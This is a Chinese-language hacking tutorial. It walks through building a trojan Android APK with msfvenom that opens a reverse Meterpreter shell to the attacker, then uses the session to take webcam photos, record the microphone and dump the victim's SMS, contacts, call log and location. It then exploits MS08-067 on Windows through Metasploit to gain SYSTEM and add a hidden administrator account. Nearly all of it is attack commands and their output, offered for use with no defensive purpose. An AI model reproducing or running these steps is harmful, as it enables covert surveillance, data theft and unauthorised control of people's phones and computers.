手机安装KaLi:Android(root权限)+Linux deploy+connectbot+ vnc/rdp远程桌面精灵
运行linux deploy>设置软件语言>发行版本kali/发行版本号sana
ssh ip 127.0.0.1 端口默认22
VNC ip地址127.0.0.1 端口5900
默认账号android 密码changeme
Android远控:DroidJack(配置服务程序/ip/端口)
Kali MSF攻击Android:msf(android/meterpreter)+apk木马
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=5555 R > /root/apk.apk # 生成apk木马(远程shell代理)
# 设置监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > show option
msf exploit(handler) > set LHOST 192.168.1.16
msf exploit(handler) > set LPORT 5555
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.16:5555
[*] Starting the payload handler …
# 目标安装并运行,入侵成功
[*] Sending stage(60790 bytes) to 192.168.1.17
[*] Meterpreter session 1 opend (192.168.1.16:5555 -> 192.168.1.17) at 2016-08-16
# 后续操作
meterpreter > sysinfo # 查看系统信息
Computer : localhost
OS : Android 5.1.1 – Linux 4.0.9-android-x86
Meterpreter : java/android
meterpreter > cd /storage/emulated/0 # 进入文件目录
#控制摄像头:
meterpreter > webcam_snap -i 1 #前置摄像头拍照截图
meterpreter > webcam_snap -i 1 #后置摄像头拍照截图
[*] Starting…
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/.jpeg
Webcam Commands:1-前置cam 2-后置cam
record_mic Record audio for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap -i 1[2] Take a snapshot from the specified webcam
webcam_stream -i 1[2] Play a video stream from the specified webcam
Android Commands:
check_root Check if device is rooted
dump_callog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocate
手机kali攻击PC:JuiceSSH+msf + ms08-067
~ msfconsole # 启动msf
msf > db_status
[*] postgresql connected to msf
#扫描目标信息
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show option(set RHOST/LHOST)
msf auxiliary(smb_version) > exploit
#漏洞攻击
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets # 漏洞影响的操作系统(可攻击目标)
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows 2003 SP0 Universal
2 Windows XP SP0/SP1/SP2/SP3
msf exploit(ms08_067_netapi) > show option(set rhost/lhost)
msf exploit(ms08_067_netapi) > exploit -j
msf exploit(ms08_067_netapi) > session -i 1
[*] Starting interaction with 1…
# 后续操作
meterpreter > getuid
[*] Server username : NT AUTHORITY\SYSTEM
meterpreter > sysinfo #Computer/OS/System Language/Domain/Logged on Users信息
meterpreter > net user # 查看登录用户
meterpreter > net user abc abc /add # 添加用户密码
meterpreter > net localgroup administrators abc /add # 设置为管理员权限
meterpreter > net user aa # 查看aa信息,远程登录GUI